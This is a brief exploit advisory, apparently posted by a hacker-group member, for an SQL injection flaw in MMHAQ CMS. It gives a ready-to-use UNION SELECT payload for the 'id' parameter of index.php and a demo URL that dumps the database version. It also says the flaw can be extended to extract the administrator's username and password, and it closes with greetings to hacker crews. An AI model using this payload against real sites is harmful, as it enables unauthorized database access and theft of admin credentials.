########################################################
MMHAQ CMS sqli vulnersbility
########################################################[+]Title: MMHAQ CMS sqli vulnersbility
[+]Version: only one version is released
[+]Download: http://www.mmhaq.net/index.php?page=pack_linux
[+]Author:s1ayer
[+]Contact: s1ayer.icw@gmail.com
########################################################
Description:
MMHAQ CMS fully functional Content Management System in PHP on top of MySQL.
Including articles, news,file management andall of the general functionalities of a CMS.
It is completely accessible and very easy to use on a daily basis.#########################################################[Exploit] :[Bug]= index.php?id=SQL][SQL]=-1%20union%20all%20select%201,version(),3,4,5,6--#[Demo] :[+] http://127.0.0.1/index.php?id=-1%20union%20all%20select%201,version(),3,4,5,6--
Explanation:Version of the database can be seen at the title bar of the browser, this exploit can be further exploited to gain the user idand password of the admin.
GREETZ: r45c4l,b0nd,sai,sm4rt,fb1,jappan,andall ICW and andhrhahackers members.